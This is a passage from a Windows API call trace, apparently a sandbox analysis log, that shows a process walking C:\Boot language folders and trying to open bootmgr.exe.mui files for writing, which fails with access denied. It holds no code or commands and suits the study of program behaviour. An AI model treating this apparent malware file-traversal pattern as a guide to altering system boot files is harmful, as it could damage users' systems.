InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.713] AreFileApisANSI () returned 1 [0070.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sl-SI\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sl-SI\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.713] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.713] AreFileApisANSI () returned 1 [0070.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 30 [0070.714] CreateFileW (lpFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.714] GetFileType (hFile=0x41c) returned 0x1 [0070.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.714] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.714] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.714] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.714] CloseHandle (hObject=0x41c) returned 1 [0070.715] AreFileApisANSI () returned 1 [0070.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0070.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sl-SI\\bootmgr.exe.mui") returned 30 [0070.715] CreateFileW (lpFileName="C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.715] GetLastError () returned 0x5 [0070.715] GetLastError () returned 0x5 [0070.715] SetLastError (dwErrCode=0x5) [0070.715] GetLastError () returned 0x5 [0070.715] SetLastError (dwErrCode=0x5) [0070.715] GetLastError () returned 0x5 [0070.715] SetLastError (dwErrCode=0x5) [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.715] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⭠\x01⺊Ā")) returned 0 [0070.715] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0070.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0070.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0070.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.716] AreFileApisANSI () returned 1 [0070.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-CS", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-CS", lpUsedDefaultChar=0x0) returned 19 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.717] AreFileApisANSI () returned 1 [0070.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0070.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7aa88 [0070.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x7aa88, cchWideChar=19 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS") returned 19 [0070.717] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS" (normalized: "c:\\boot\\sr-latn-cs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.717] GetLastError () returned 0x5 [0070.717] GetLastError () returned 0x5 [0070.717] SetLastError (dwErrCode=0x5) [0070.717] GetLastError () returned 0x5 [0070.717] SetLastError (dwErrCode=0x5) [0070.717] GetLastError () returned 0x5 [0070.717] SetLastError (dwErrCode=0x5) [0070.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aa88 | out: hHeap=0x20000) returned 1 [0070.717] AreFileApisANSI () returned 1 [0070.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0070.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7a818 [0070.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887c0, cbMultiByte=-1, lpWideCharStr=0x7a818, cchWideChar=19 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS") returned 19 [0070.717] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS" (normalized: "c:\\boot\\sr-latn-cs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.717] GetLastError () returned 0x5 [0070.718] GetLastError () returned 0x5 [0070.718] SetLastError (dwErrCode=0x5) [0070.718] GetLastError () returned 0x5 [0070.718] SetLastError (dwErrCode=0x5) [0070.718] GetLastError () returned 0x5 [0070.718] SetLastError (dwErrCode=0x5) [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a818 | out: hHeap=0x20000) returned 1 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.718] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.718] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.718] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.718] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0070.718] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0070.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0070.719] FindFirstFileExW (in: lpFileName="C:\\Boot\\sr-Latn-CS\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78090 [0070.719] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.719] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0070.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0070.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0070.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0070.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0070.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0070.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.720] AreFileApisANSI () returned 1 [0070.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 35 [0070.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0070.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.720] AreFileApisANSI () returned 1 [0070.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0070.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0070.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 35 [0070.720] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.722] GetFileType (hFile=0x41c) returned 0x1 [0070.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0070.722] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.722] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.722] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.723] CloseHandle (hObject=0x41c) returned 1 [0070.726] AreFileApisANSI () returned 1 [0070.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0070.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0070.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui") returned 35 [0070.726] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.726] GetLastError () returned 0x5 [0070.726] GetLastError () returned 0x5 [0070.726] SetLastError (dwErrCode=0x5) [0070.726] GetLastError () returned 0x5 [0070.726] SetLastError (dwErrCode=0x5) [0070.726] GetLastError () returned 0x5 [0070.726] SetLastError (dwErrCode=0x5) [0070.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0070.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0070.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.726] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, 